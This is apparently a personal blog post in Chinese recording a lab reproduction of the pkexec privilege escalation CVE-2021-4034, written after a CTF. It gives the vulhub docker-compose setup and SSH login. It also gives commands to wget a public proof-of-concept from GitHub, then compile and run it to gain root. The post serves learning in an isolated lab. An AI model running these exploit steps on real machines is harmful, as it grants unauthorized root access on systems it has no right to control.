pkexec提权(CVE-2021-4034)

前言

刚打完的长城杯的一个渗透题,开始 Shiro 直接打进去了,结果卡在了提权,这里学习记录一下

环境搭建

下载或复制下面这个docker-compose.ymlhttps://github.com/vulhub/vulhub/blob/master/polkit/CVE-2021-4034/docker-compose.yml

1
2
3
4
5
6
version: '2'
services:
cmd:
image: vulhub/polkit:0.105
ports:
- 2222:2222

然后运行下面命令启动环境(有点费时)

1
docker-compose up -d

image-20260323194321940

1
docker ps

image-20260323194539460

漏洞复现

使用 ubuntu/vulhub 登录目标 SSH 服务器

1
ssh ubuntu@127.0.0.1 -p2222

第一次连接的时候没连接上

image-20260323195014553

不过再试一次就好了

image-20260323195101125

此时是Ubuntu用户

image-20260323195134135

POC地址:https://github.com/berdav/CVE-2021-4034

wget命令的话就直接去下载POC了

1
wget https://github.com/berdav/CVE-2021-4034/archive/refs/heads/main.tar.gz

不过对网络有点要求,我这里失败了

image-20260323200759218

不过既然可以连接 SSH 了,我直接把POC下载到本地,然后用工具连接上传就好啦

image-20260323201040118

大意了,没有unzip命令

image-20260323201114924

就不传压缩包了,改成传文件夹

image-20260323201147988

然后就是可以编译并提权了

1
2
3
cd CVE-2021-4034-main
make
./cve-2021-4034

image-20260323201329567


pkexec提权(CVE-2021-4034)
https://yschen20.github.io/2026/03/23/pkexec提权(CVE-2021-4034)/
作者
Suzen
发布于
2026年3月23日
更新于
2026年3月23日
许可协议